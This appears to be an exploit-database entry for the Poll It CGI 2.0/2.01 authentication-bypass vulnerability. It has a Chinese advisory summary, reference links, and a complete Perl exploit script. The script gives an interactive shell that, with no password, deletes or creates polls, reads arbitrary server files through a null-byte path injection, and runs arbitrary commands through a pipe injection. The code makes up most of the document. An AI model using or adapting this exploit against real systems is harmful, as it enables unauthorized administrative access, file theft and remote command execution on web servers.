https://www.exploit-db.com/exploits/177
https://www.securityfocus.com/bid/88551
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-009

PollIt2.01及其之前版本的pollit.cgi存在漏洞。远程攻击者可以通过将entered_password和admin_password参数的规格化为相同的值，在不知道真实密码的情况下访问管理员函数。

#!/usr/bin/perl

######################################
#                                    #
#                                    #
#      Poll It CGI v2.0 exploit      #
#       keelis/havoc korp 2000       #
#                                    #
#    shouts to modjo, p, zen, kd,    #
#     ab, all the script kiddies.    #
#                                    #
#                                    #
#     keelis(at)hushmail(dot)com     #
#                                    #
#                                    #
######################################

use Socket;

($host, $cgi_loc) = @ARGV[0,1];

$ip=inet_aton($host);

print("nt+---   Poll It CGI v2.0 exploit  ---+");
print("nt+---    keelis/havoc korp 2000   ---+nnn");

usage() if (!defined($host) || !defined($cgi_loc));

while(true)
{
	print "[poll@$host] ";

	$stdin = *STDIN;
	$cmdin = <$stdin>;

	chomp($cmdin);
	($cmd, $param) = split(/ /, $cmdin, 2);
	
	if ($cmd eq "d")
	{
		$request = "?load=admin&admin_password=&action=delete_poll";
		$success_msg = "current poll has been deletednn";
		make_request();
	}

	if ($cmd eq "e")
	{
		$request = "?load=admin&admin_password=&action=expire_poll";
		$success_msg = "current poll has been expirednn";
		make_request();
	}

	if ($cmd eq "c")
	{
		if (!defined($param))
		{
			print "you need to specify a voting topic for the new pollnn";
			next;
		}

		$request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param";
		$success_msg = "created new poll with voting topic: "$param"nn";
		make_request();
	}

	if ($cmd eq "a")
	{
		if (!defined($param))
		{
			print "you need to specify the text for the new voting optionnn";
			next;
		}

		$request = "?load=admin&admin_password=&action=add_option&add_option=$param";
		$success_msg = "voting option added to current poll: "$param"nn";
		make_request();
	}

	if ($cmd eq "g")
	{
		if (!defined($param))
		{
			print "you need to specify the command to be runnn";
			next;
		}

		$request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C";
		$success_msg = "command has been run on remote server: "$param"nn";
		make_request();
	}

	if ($cmd eq "r")
	{
		if (!defined($param))
		{
			print "you need to specify the file to be readnn";
			next;
		}

		$request = "?load=admin&data_dir=$param%00";
		$success_msg = "contents of "$param" follow:nn";
		make_request();
	}

	if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help")
	{
		print "n? ttshow this help screenn";
		print "d ttdelete current polln";
		print "e ttexpire current polln";
		print "c <param>tcreate new poll using <param> as topicn";
		print "a <param>tadd <param> to voting optionsn";
		print "r <param>tread the file <param> in remote servern";
		print "g <param>trun <param> in the remote servern";
		print "x ttexit pollex.pl shellnn";
		next;
	}

	if ($cmd eq "x")
	{
		print "n";
		last;
	}

	print "command not found. use "?" for help screen.nn";
}

sub make_request {
	$request=~s/ /+/g;
	$request=~s/\/%5C/g;
	$request=~s///%2F/g;

	my @req=sendraw("GET $cgi_loc$request HTTP/1.1rnHost: $hostrnrn");
	$reqanswer=join('', @req);

	($httpv, $httpcode) = split(/ /, $reqanswer);
	$httpcode = substr($httpcode, 0, 3);

	if ($httpcode eq "200") {
		print $success_msg if ($cmd ne "r");
	} else {
		if ($httpcode ne "404")
		{
			print "httpd returned an error code:nn";
			print $reqanswer,"n";
		} else {
			die "unexpected httpd error code 404. aborting...nn"
		}
	}


	if ($cmd eq "r")
	{	$reqanswer=substr($reqanswer, index($reqanswer, "rnrn")+4);

		if (substr($reqanswer, 6, 15) eq "Template : File")
		{
			print "file "$param" not found or non-readable from cginn";
		} else {
			print $success_msg;
			print $reqanswer,"n";
		}
	}

	next;
}

sub usage {
	print "Usage:  pollex.pl <host> <cgi_loc>nn";
	print "thost   :thost/ip where CGI residesn";
	print "tcgi_loc:tpath to the CGI (non-SSI version needed)nn";
	exit(0);
}

sub sendraw {
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("socket problems... aborting.n");

        if(connect(S,pack "SnA4x8",2,80,$ip)){
                select(S);
                $|=1;
                print $pstr;
                my @in=<S>; 
                select(STDOUT);
	        close(S); 
                return @in;
        } else {
		die("can't connect... aborting.n");
	}
}

# milw0rm.com [2000-11-15]

CGI-World Poll It Pro 1.6

CGI-World Poll It 2.01

CGI-World Poll It 2.0

来源:XF
名称:pollit-admin-password-var
链接:http://xforce.iss.net/static/5419.php
来源:BUGTRAQ
名称:20001023Re:PollItv2.0cgi(again)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=97236719315352&w;=2